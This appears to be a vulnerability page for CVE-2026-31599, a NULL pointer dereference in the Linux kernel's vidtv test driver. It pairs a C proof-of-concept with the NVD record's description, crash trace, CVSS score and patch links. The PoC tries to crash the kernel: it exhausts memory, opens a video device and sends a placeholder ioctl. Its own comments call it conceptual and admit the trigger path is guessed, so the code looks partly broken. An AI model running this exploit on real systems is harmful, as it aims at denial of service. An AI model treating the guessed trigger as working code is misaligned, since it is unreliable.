CVE-2026-31599

/* * PoC for CVE-2026-31599 * This code attempts to trigger the NULL pointer dereference * by interacting with the vidtv driver under memory pressure. * Note: This is a conceptual PoC based on the vulnerability description. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define DEVICE "/dev/video0" // Typical device node, may vary void consume_memory() { // Attempt to exhaust memory to force allocation failure in kernel size_t chunk_size = 1024 * 1024 * 100; // 100MB void *ptr; int i = 0; while (1) { ptr = malloc(chunk_size); if (!ptr) break; memset(ptr, 0x41, chunk_size); i++; if (i > 1000) break; // Safety limit } printf("Allocated %d chunks\n", i); } int main() { int fd = -1; printf("[+] Starting PoC for CVE-2026-31599\n"); // 1. Consume memory to increase likelihood of kmalloc failure consume_memory(); // 2. Open the vidtv device fd = open(DEVICE, O_RDWR); if (fd < 0) { perror("[-] Failed to open device"); return 1; } printf("[+] Device opened\n"); // 3. Trigger the vulnerable code path // The crash happens during stream initialization (vidtv_start_streaming -> vidtv_mux_init) // We simulate the interaction that leads to vidtv_channel_si_init if (ioctl(fd, 0, NULL) < 0) { // IOCTL might fail, but open/read/write paths might trigger it too // depending on driver implementation details not fully visible here. // Usually starting a stream triggers the PMT init. perror("[-] IOCTL failed"); } printf("[+] Exploit logic executed. Check kernel logs for crash.\n"); close(fd); return 0; }

{"cve": {"id": "CVE-2026-31599", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-24T15:16:38.777", "lastModified": "2026-04-29T20:12:57.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: vidtv: fix NULL pointer dereference in vidtv_channel_pmt_match_sections\n\nsyzbot reported a general protection fault in vidtv_psi_desc_assign [1].\n\nvidtv_psi_pmt_stream_init() can return NULL on memory allocation\nfailure, but vidtv_channel_pmt_match_sections() does not check for\nthis. When tail is NULL, the subsequent call to\nvidtv_psi_desc_assign(&tail->descriptor, desc) dereferences a NULL\npointer offset, causing a general protection fault.\n\nAdd a NULL check after vidtv_psi_pmt_stream_init(). On failure, clean\nup the already-allocated stream chain and return.\n\n[1]\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN PTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\nRIP: 0010:vidtv_psi_desc_assign+0x24/0x90 drivers/media/test-drivers/vidtv/vidtv_psi.c:629\nCall Trace:\n <TASK>\n vidtv_channel_pmt_match_sections drivers/media/test-drivers/vidtv/vidtv_channel.c:349 [inline]\n vidtv_channel_si_init+0x1445/0x1a50 drivers/media/test-drivers/vidtv/vidtv_channel.c:479\n vidtv_mux_init+0x526/0xbe0 drivers/media/test-drivers/vidtv/vidtv_mux.c:519\n vidtv_start_streaming drivers/media/test-drivers/vidtv/vidtv_bridge.c:194 [inline]\n vidtv_start_feed+0x33e/0x4d0 drivers/media/test-drivers/vidtv/vidtv_bridge.c:239"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10", "versionEndExcluding": "6.6.136", "matchCriteriaId": "0F98EDB3-BDF6-4821-9197-1BA4A2E056E2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.83", "matchCriteriaId": "7F0AE5B5-23AC-4DCC-B37A-51CA1DAE7BA8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.24", "matchCriteriaId": "8126B8B8-6D0B-4443-86C1-672AEE893555"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.14", "matchCriteriaId": "D6A8A074-BBF4-4803-ABED-519A839435BB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0", "versionEndExcluding": "7.0.1", "matchCriteriaId": "9B5888AB-7403-4335-89E4-21CC0B48366A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/07c1e474cf9acf777f09d14a8f8dfcef5b84e46f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2dff11fb5098ae453651f8f77e94ad499c078022", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b7efb4c94797c504a1c678edb48c2aa311d3309f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b832cfd516b8504e95884622cee60bf9a39b7945", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e589de36da106ef739ba98f66f5a5c2023370706", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f8e1fc918a9fe67103bcda01d20d745f264d00a7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}